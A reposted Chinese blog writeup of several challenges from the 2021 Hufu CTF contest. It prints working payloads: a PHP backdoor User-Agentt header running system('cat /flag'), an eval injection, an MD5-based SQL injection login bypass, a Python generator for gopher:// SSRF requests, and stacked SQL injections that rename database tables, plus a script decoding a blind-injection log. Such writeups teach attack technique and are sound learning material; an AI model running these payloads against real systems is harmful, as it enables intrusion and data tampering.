小言_互联网的博客

2021数字中国创新大赛虎符网络安全赛-部分Writeup

404人阅读  评论(0)


Web

签到



http://cn-sec.com/archives/313267.html

User-Agentt: zerodiumsystem("cat /flag");

unsetme


这题先放着

/?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27);

“慢慢做”管理系统



根据题目提示,这里第一步登录应该利用一些字符串被md5($string,true)之后会形成如下,从而造成注入

PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('ffifdyop',true));"
Command line code:1:
string(16) "'or'6�]��!r,��b"
PS C:\Users\Administrator\Downloads>

但是遗憾的是这里的ffifdyop,被过滤了

所以我们需要寻找另一个能和ffifdyop达到同样效果的字符,搜索引擎找一找
https://blog.csdn.net/March97/article/details/81222922

PS C:\Users\Administrator\Downloads> php -r "var_dump(md5('129581926211651571912466741651878684928',true));"
Command line code:1:
string(16) "�T0D��o#��'or'8"
PS C:\Users\Administrator\Downloads>
/?username=admin&password=129581926211651571912466741651878684928

成功登录

根据题目的提示,直接在内网找一下admin.php

/ssrf.php?way=127.0.0.1%2Fadmin.php


抓一下这个后台管理系统的包,然后整理一下这个127.0.0.1/admin.php的包,通过gopher协议发送POST数据过去看一下,用python简单处理下

from urllib.parse import quote

payload = "username=mochu7&password=mochu7"

postdata = """
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(len(payload),payload)

final_payload = 'gopher://127.0.0.1:80/_'+ quote(quote(postdata))
print(final_payload)
print(postdata)
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252031%250A%250Ausername%253Dmochu7%2526password%253Dmochu7%250A


成功发送,接下来测试一下注入,加个单引号看看

username=mochu7'&password=mochu7

直接报错了

很明显这是注入,不过经过后面的fuzz测试发现这里存在,而且这个回显我看着就非常眼熟

username=mochu7';show databases#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252048%250A%250Ausername%253Dmochu7%2527%253Bshow%2520databases%2523%2526password%253Dmochu7%250A

Databases:
ctf
ctf2
information_schema

接着查

username=mochu7';use ctf;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252053%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf%253Bshow%2520tables%2523%2526password%253Dmochu7%250A

username=mochu7';use ctf2;show tables#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252054%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520tables%2523%2526password%253Dmochu7%250A

Tables_in_ctf:
users
Tables_in_ctf2:
fake_admin
real_admin_here_do_you_find

我们想要找的是真正的admin密码

username=mochu7';use ctf2;show columns from `fake_admin`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252073%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560fake_admin%2560%2523%2526password%253Dmochu7%250A

username=mochu7';use ctf2;show columns from `real_admin_here_do_you_find`#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%252090%250A%250Ausername%253Dmochu7%2527%253Buse%2520ctf2%253Bshow%2520columns%2520from%2520%2560real_admin_here_do_you_find%2560%2523%2526password%253Dmochu7%250A


本来应该继续查字段内容得到real_admin_here_do_you_find表中的password字段内容,但是这里过滤selecthandler等,比赛的时候也就没去研究怎么查询到字段数据了,因为这题很明显像之前强网杯那题,我对那题有印象记得当时有一个通过修改想要查询的表的表名(real_admin_here_do_you_find)为当前使用的表(fake_admin),然后构造一下注入得到当前表的数据的做法

username=mochu7';rename table fake_admin to mochu7;rename table real_admin_here_do_you_find to fake_admin#&password=mochu7
gopher://127.0.0.1:80/_%250APOST%2520/admin.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AContent-Length%253A%2520122%250A%250Ausername%253Dmochu7%2527%253Brename%2520table%2520fake_admin%2520to%2520mochu7%253Brename%2520table%2520real_admin_here_do_you_find%2520to%2520fake_admin%2523%2526password%253Dmochu7%250A

username=mochu7'or 1=1;show tables;#&password=mochu7


得到真正的admin密码:5fb4e07de914cfc82afb44vbaf402203
最后传入真正的admin账户名和密码

username=admin&password=5fb4e07de914cfc82afb44vbaf402203

提示我们访问/flag.php,并且查看源码拿着cookie去

Misc

你会日志分析吗

时间盲注日志分析

发现每一位中的这些测试包,都有一个包长度与其他的不一样,那这一位应该就是正确的flag,直接用Python简单处理下

from base64 import *

flag = ''
with open('access.log','r') as f:
    lines = f.readlines()
    for line in lines:
        if "select%20flag%20from%20flllag" in line:
            packet_len = line[line.find(' 200 ')+5:line.find(' "-" "python-requests/2.21.0"')]
            if packet_len == '377':
                ascii_code = line[line.find('))=')+3:line.find(',sleep')]
                ascii_str = chr(int(ascii_code))
                flag += ascii_str
            else:
                pass
        else:
            pass

print(b64decode(flag).decode('utf-8'))
flag{You_are_so_great}

sectraffic


转载:https://blog.csdn.net/mochu7777777/article/details/115422328
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场